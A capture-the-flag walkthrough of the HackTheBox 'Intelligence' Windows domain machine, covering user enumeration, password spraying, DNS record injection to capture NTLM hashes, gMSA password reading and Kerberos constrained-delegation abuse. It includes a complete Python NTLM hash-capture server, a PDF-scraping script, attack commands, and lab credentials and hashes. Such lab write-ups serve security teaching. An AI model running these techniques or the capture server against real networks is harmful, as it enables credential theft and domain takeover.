Scanning
Let's start by scanning the target with nmap (-p- covers all 65535 TCP ports and -A adds version detection, default scripts, OS detection and traceroute, so this takes a while):
nmap -p- -sV -sC -A 10.10.10.248
The scan shows a bunch of open ports and the domain name intelligence.htb. I added the domain and the server IP to my /etc/hosts
file.
Let's start enumerating.
Accessing & Enumerating Port 80
Port 80 serves a company web page.
Going through the whole site, I found two PDF files linked from it.
I downloaded them with wget, but I could not make sense of the file content. So I extracted the file metadata with exiftool:
exiftool 2020-01-01-upload.pdf
The Creator field holds what looks like a username. I checked whether this user actually exists in the AD environment with the kerbrute
tool.
I saved the username in a file named user.txt and ran kerbrute's userenum mode against the DC:
./kerbrute userenum -v --dc 10.10.10.248 -d intelligence.htb user.txt
kerbrute reports it as a valid username, so the Creator field holds real domain usernames. (userenum only sends AS-REQs and reads the KDC's error code, which differs for unknown principals, so it is not a password guess and does not count toward account lockout.)
I did the same with the second PDF and found another user, Jose.Williams.
I checked whether either user has Kerberos pre-authentication disabled (AS-REP roasting) with impacket-GetNPUsers,
but found nothing :(
I tried brute-forcing the SMB password for these users without luck, and anonymous LDAP and DNS enumeration gave nothing either :(
Back on the website: /documents/ cannot be listed directly, but the PDF names follow the format YYYY-MM-DD-upload.pdf, so we can fuzz for more of them.
URL: http://intelligence.htb/documents/
I wrote a Python script that checks, for every month and day of 2020, whether a PDF with that date exists and downloads it if it does:
import requests

# Base URL to check the existence of the PDF
base_url = "http://intelligence.htb/documents/"

# Loop through all months (01 to 12)
for month in range(1, 13):
    # Format the month to two digits
    month_str = f"{month:02d}"
    # Loop through all days (01 to 31); impossible dates such as 2020-02-31 simply return 404
    for day in range(1, 32):
        # Format the day to two digits
        day_str = f"{day:02d}"
        # Create the filename
        filename = f"2020-{month_str}-{day_str}-upload.pdf"
        # Full URL
        url = base_url + filename
        # Check if the file exists (HEAD avoids transferring the body for every probe)
        response = requests.head(url, timeout=10)
        if response.status_code == 200:
            print(f"File found: {filename}. Downloading...")
            # If it exists, download the file
            response = requests.get(url, timeout=10)
            with open(filename, "wb") as f:
                f.write(response.content)
        else:
            print(f"File not found: {filename}")
After running this script I had a big pile of PDFs :( lots of work.
Rather than running exiftool on each file, I pulled every Creator name out with strings and saved the deduplicated list to user.txt (the sort -u matters: spraying the same user several times is pointless and eats into the lockout threshold):
cat *.pdf | strings | grep Creator | cut -d '(' -f 2 | cut -d ')' -f 1 | grep -v Tex | grep -v TeX | sort -u > user.txt
With the full user list I again looked for accounts with pre-authentication disabled; for those the KDC hands out an AS-REP encrypted with the user's key, which can be cracked offline:
impacket-GetNPUsers -dc-ip 10.10.10.248 intelligence.htb/ -usersfile user.txt -no-pass
But found none :(
Then I went through the content of all the PDFs. To see them on one page I uploaded them to https://smallpdf.com/ (on a real engagement keep client documents local; pdftotext from poppler-utils does the same job offline).
After going through all the pages I found a PDF that contains a cleartext password.
Now we have a user list and one password, so I password-sprayed it over SMB with crackmapexec (one password against every user, which stays well under any lockout threshold):
crackmapexec smb 10.10.10.248 -u user.txt -p "NewIntelligenceCorpUser9876"
It found one username, Tiffany.Molina, that the password works for :)
With smbclient I listed the shares available to this user:
smbclient -L //10.10.10.248 --user Tiffany.Molina
Then I connected to the Users share with her credentials:
smbclient //10.10.10.248/Users --user Tiffany.Molina --password NewIntelligenceCorpUser9876
and found the user.txt flag on her Desktop :)
Then I accessed the IT share and found a script named downdetector.ps1.
I downloaded this PowerShell script to my machine and read its content:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if(.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
The script enumerates the DNS records of the intelligence.htb zone whose name starts with "web", requests http://<name>/ from each of them with -UseDefaultCredentials (the credentials of the account the scheduled task runs as), and mails Ted Graves if a host looks down. Two things matter for us: by default any authenticated domain user can create records in an AD-integrated DNS zone, and -UseDefaultCredentials means the task will NTLM-authenticate to whatever "web*" host we point it at.
So we add a "web*" record that resolves to our machine with krbrelayx's dnstool.py and catch the authentication with Responder:
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'webprooplayer' -d 10.10.14.34 10.10.10.248
Now run Responder on the tun0 interface; within about 5 minutes (the task's schedule) you get the NetNTLMv2 hash of Ted.Graves:
sudo responder -I tun0
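What Responder does during the capture above, as an added example that is not part of the original writeup and not Responder's or krbrelayx's code: a minimal HTTP listener that answers the scheduled task's request with 401 and WWW-Authenticate: NTLM, replies to the client's Type 1 with a Type 2 challenge carrying a fixed 8-byte server challenge (1122334455667788, the same default Responder uses, so the captured response is crackable), parses the Type 3 AUTHENTICATE message and prints the NetNTLMv2 line in the format john and hashcat expect. build_type3 only constructs a sample client message so the parser can be exercised offline; the target name "DC", the workstation "WS" and the listening port are assumptions.

```python
import base64
import struct
from http.server import BaseHTTPRequestHandler, HTTPServer

NTLMSSP = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
NEGOTIATE_NTLM = 0x00000200
TARGET_TYPE_SERVER = 0x00020000
NEGOTIATE_EXTENDED_SESSIONSECURITY = 0x00080000
NEGOTIATE_TARGET_INFO = 0x00800000
NEGOTIATE_128 = 0x20000000
NEGOTIATE_56 = 0x80000000

# Fixed server challenge (Responder's default) so the captured response can be cracked offline.
CHALLENGE = bytes.fromhex("1122334455667788")


def _field(buf: bytes, at: int) -> bytes:
    """Read an NTLM (Len, MaxLen, Offset) buffer descriptor at `at` and return the bytes it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", buf, at)
    return buf[offset:offset + length]


def build_type2(server_challenge: bytes, target_name: str = "DC") -> bytes:
    """Build a CHALLENGE_MESSAGE (Type 2) around our server challenge; target_name is an assumed value."""
    name = target_name.encode("utf-16-le")
    # TargetInfo AV_PAIR list: MsvAvNbComputerName (id 1) followed by MsvAvEOL (id 0)
    target_info = struct.pack("<HH", 1, len(name)) + name + struct.pack("<HH", 0, 0)
    flags = (NEGOTIATE_UNICODE | NEGOTIATE_NTLM | TARGET_TYPE_SERVER | NEGOTIATE_EXTENDED_SESSIONSECURITY
             | NEGOTIATE_TARGET_INFO | NEGOTIATE_128 | NEGOTIATE_56)
    header_len = 48                                                   # fixed part without the optional Version
    msg = NTLMSSP + struct.pack("<I", 2)
    msg += struct.pack("<HHI", len(name), len(name), header_len)     # TargetNameFields
    msg += struct.pack("<I", flags)
    msg += server_challenge + b"\x00" * 8                             # ServerChallenge, Reserved
    msg += struct.pack("<HHI", len(target_info), len(target_info), header_len + len(name))  # TargetInfoFields
    return msg + name + target_info


def parse_type3(data: bytes) -> dict:
    """Parse an AUTHENTICATE_MESSAGE (Type 3); descriptors sit at fixed offsets (MS-NLMP 2.2.1.3)."""
    if data[:8] != NTLMSSP or struct.unpack_from("<I", data, 8)[0] != 3:
        raise ValueError("not an NTLM Type 3 message")
    flags = struct.unpack_from("<I", data, 60)[0]
    codec = "utf-16-le" if flags & NEGOTIATE_UNICODE else "ascii"
    return {
        "lm_response": _field(data, 12),
        "nt_response": _field(data, 20),
        "domain": _field(data, 28).decode(codec),
        "user": _field(data, 36).decode(codec),
        "workstation": _field(data, 44).decode(codec),
    }


def to_netntlmv2(server_challenge: bytes, parsed: dict) -> str:
    """Format for john (--format=netntlmv2) / hashcat (-m 5600): user::domain:challenge:NTProofStr:blob."""
    nt = parsed["nt_response"]
    if len(nt) <= 24:
        raise ValueError("24-byte NT response means NTLMv1; this formatter handles NTLMv2 only")
    return "%s::%s:%s:%s:%s" % (parsed["user"], parsed["domain"], server_challenge.hex(),
                                nt[:16].hex(), nt[16:].hex())


def build_type3(user: str, domain: str, nt_response: bytes, workstation: str = "WS") -> bytes:
    """Constructed client Type 3 (what a real client sends) so the parser can be exercised offline."""
    lm_response = b"\x00" * 24                                        # NTLMv2 clients send a zero LM response
    items = [lm_response, nt_response, domain.encode("utf-16-le"), user.encode("utf-16-le"),
             workstation.encode("utf-16-le"), b""]                    # last item: EncryptedRandomSessionKey
    header_len = 88                                                   # 6 descriptors + flags + Version + MIC
    msg = NTLMSSP + struct.pack("<I", 3)
    offset = header_len
    for item in items:
        msg += struct.pack("<HHI", len(item), len(item), offset)
        offset += len(item)
    msg += struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM | NEGOTIATE_EXTENDED_SESSIONSECURITY)
    msg += b"\x00" * 8 + b"\x00" * 16                                 # Version and MIC, zeroed in this sample
    return msg + b"".join(items)


class NTLMCapture(BaseHTTPRequestHandler):
    """401 NTLM -> client Type 1 -> our Type 2 -> client Type 3 -> crackable line printed."""
    protocol_version = "HTTP/1.1"                                     # NTLM needs the TCP connection kept open

    def _reply(self, code: int, www_authenticate: str = None) -> None:
        self.send_response(code)
        if www_authenticate:
            self.send_header("WWW-Authenticate", www_authenticate)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        auth = self.headers.get("Authorization", "")
        if not auth.startswith("NTLM "):
            return self._reply(401, "NTLM")
        msg = base64.b64decode(auth[5:])
        if struct.unpack_from("<I", msg, 8)[0] == 1:                  # NEGOTIATE: answer with our challenge
            return self._reply(401, "NTLM " + base64.b64encode(build_type2(CHALLENGE)).decode())
        print(to_netntlmv2(CHALLENGE, parse_type3(msg)))              # AUTHENTICATE: log the hash line
        self._reply(200)

    def log_message(self, *args):                                     # keep the console to captured hashes
        pass


if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 80), NTLMCapture).serve_forever()         # port 80 because the task uses plain http://
```

Run it as root (port 80) on the tun0 address that the DNS record points at; the printed line is what you feed to john or hashcat. Because the challenge is fixed, anyone who captures the traffic can crack the hash too, so a real tool should be used only on the engagement's own interface.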
I cracked this hash with John the Ripper (it is a NetNTLMv2 hash: john --format=netntlmv2, or hashcat mode 5600).
We now have Ted's password, but still cannot log on anywhere :(
I didn't find anything useful in SMB with it either. So I ran bloodhound-python to enumerate the user's privileges:
bloodhound-python -c All -u 'Ted.Graves' -p 'Mr.Teddy' -d intelligence.htb -ns 10.10.10.248 --zip
I uploaded the zip into BloodHound and marked Tiffany.Molina & Ted.Graves as owned.
After a bit of analysis I found this: the itsupport group has ReadGMSAPassword over the svc_int account. A quick search turned up a GitHub project for exactly this: https://github.com/micahvandeusen/gMSADumper
ReadGMSAPassword means members of that group can read the msDS-ManagedPassword attribute of the group managed service account, which holds the account's current password; from it the NT hash can be derived and used directly, no cracking needed. I cloned the repository and ran it as Ted.Graves:
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
This gave me the NT hash of svc_int$ (not a TGT; the hash is what goes into -hashes below).
Pass The Ticket (PTT)
After some searching I found a blog showing impacket's getST.py, which can request a service ticket for the administrator user: with -impersonate it performs S4U2self followed by S4U2proxy, which works because svc_int$ is allowed to delegate to the WWW/dc.intelligence.htb service (constrained delegation).
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator
Running this gave me the error "Clock skew too great": Kerberos rejects requests whose timestamp is more than 5 minutes off the KDC's clock, so my machine's clock had to be synced with the DC.
I searched for this and found a Medium blog that worked like a charm :)
I followed the same steps and it started working.
Steps I followed:
su
timedatectl set-ntp off
rdate -n 10.10.10.248
impacket-getST 'intelligence.htb/svc_int$' -spn WWW/dc.intelligence.htb -hashes ':51e4932f13712047027300f869d07ab6' -impersonate administrator
Then I tried using this ticket with psexec, but it didn't work; stuck again.
Later I found that impacket has a script named atexec that executes commands remotely through the Task Scheduler. To use it with the ticket, export the administrator service ticket so the Kerberos-aware impacket tools pick it up (pass -k -no-pass so they read the ccache instead of asking for a password):
export KRB5CCNAME=administrator@WWW_dc.intelligence.htb@INTELLIGENCE.HTB.ccache
Then I executed whoami with atexec.
Replacing whoami with a type of the root flag path gave me root.txt :)
Intelligence Machine Solved Successfully!!